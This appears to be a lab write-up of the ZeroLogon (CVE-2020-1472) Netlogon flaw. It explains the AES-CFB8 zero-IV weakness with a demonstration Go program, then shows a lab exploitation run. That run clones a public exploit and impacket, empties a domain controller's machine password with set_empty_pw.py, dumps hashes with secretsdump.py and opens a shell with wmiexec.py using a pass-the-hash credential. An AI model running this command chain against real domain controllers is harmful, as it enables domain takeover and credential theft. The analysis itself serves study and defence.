ZeroLogon Exploit

CVE-2020-1472, 6 Oct 2020


Introduction

CVE-2020-1472 is a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) for which Microsoft released a patch (KB4565349) in August 2020. The vulnerability was discovered by a Secura security researcher on 11 September 2020. The weak point is the use of the Advanced Encryption Standard in Cipher Feedback 8-bit mode (AES-CFB8), which MS-NRPC uses to compute the client credential from the "Client Challenge" during the third step of the handshake. ZeroLogon affected all Windows servers that act as Active Directory domain controllers in enterprise networks.

The following diagram shows the MS-NRPC authentication handshake; the attack targets step 3, where the client credential is computed by encrypting the client challenge with AES-CFB8.

The way MS-NRPC uses AES-CFB8 has a problem with the Initialisation Vector (IV). The IV should be a random value, but MS-NRPC fixes it at 16 bytes of zeros. As a result, if the client challenge is set to all zeros, the encrypted result is all zeros with probability 1/256: once the first output byte is zero, the cipher's shift register never changes, so every following byte is zero as well. This makes it easy to pass the step 4 validation. The attack details are described in the whitepaper by Tom Tervoort.
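
The zero-IV bias described above, as an added Go example that is not part of the original page or of the RiskSense/impacket scripts: it implements AES-CFB8 over the 8-byte challenge, counts how often an all-zero challenge encrypts to an all-zero credential under constructed sample session keys, and goes one step beyond the text by comparing a zero IV with a fixed non-zero IV to show that the collapse depends on the IV being zero. The key derivation and demoIV are constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/sha256"
	"fmt"
)

// encryptChallenge is AES-CFB8 as MS-NRPC uses it to turn the 8-byte client
// challenge into a credential: each byte is XORed with the first byte of
// AES_k(register), then the register shifts left one byte and takes in the
// ciphertext byte. With a zero IV and zero challenge, a zero first byte leaves
// the register unchanged, so the whole credential is zero with p = 1/256.
func encryptChallenge(key []byte, iv [16]byte, challenge [8]byte) []byte {
	block, _ := aes.NewCipher(key) // 16-byte key, so NewCipher cannot fail
	reg, out := iv, make([]byte, 8)
	var ks [16]byte
	for i, p := range challenge {
		block.Encrypt(ks[:], reg[:])
		out[i] = p ^ ks[0]
		copy(reg[:15], reg[1:])
		reg[15] = out[i]
	}
	return out
}

// countZeroCredentials encrypts an all-zero challenge under `trials` sample
// session keys (constructed from a counter, not real Netlogon keys) with the
// given IV and returns how often the credential comes out all zeros.
func countZeroCredentials(iv [16]byte, trials uint32) (hits int) {
	for n := uint32(0); n < trials; n++ {
		key := sha256.Sum256([]byte(fmt.Sprint("demo-session-key-", n)))
		if bytes.Equal(encryptChallenge(key[:16], iv, [8]byte{}), make([]byte, 8)) {
			hits++
		}
	}
	return hits
}

// demoIV is a constructed, fixed but non-zero IV used only for the comparison.
var demoIV = [16]byte{0x5a, 0xc3, 0x17, 0x88, 0x2e, 0x91, 0xd4, 0x0b, 0x63, 0xf7, 0x4c, 0xa9, 0x35, 0xe0, 0x7d, 0x12}

func main() {
	fmt.Printf("zero IV:     %d/8192 all-zero credentials (about 32 expected)\n", countZeroCredentials([16]byte{}, 8192))
	fmt.Printf("non-zero IV: %d/8192 all-zero credentials (0 expected)\n", countZeroCredentials(demoIV, 8192))
}
```

With a non-zero IV a zero first byte still changes the register, so each later byte is a fresh block encryption and an all-zero credential has probability about 2^-64 instead of 1/256.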

Exploitation Demo

Target Environment

Host Name: FKCLAI-WIN2016
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
Domain: FKCLAI.local
Logon Server: \\FKCLAI-WIN2016

Tools Setup

root@kclai:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
root@kclai:~/Documents/ctf/expoit# 

Remove the packaged impacket scripts so they do not conflict with the version built from source:

root@kclai:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree       
Reading state information... Done

Get the latest impacket from https://github.com/SecureAuthCorp/impacket.git and install it:

root@kclai:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.
root@kclai:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file

Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin

Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
root@kclai:~/Documents/ctf/tools/win/impacket# 

Start Exploit

python3 set_empty_pw.py fkclai-win2016 192.168.1.169

secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

wmiexec.py fkclai/administrator@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

Many PoC exploits have been released.

This demo uses RiskSense's ZeroLogon exploitation script together with the latest update of impacket.

mimikatz Coding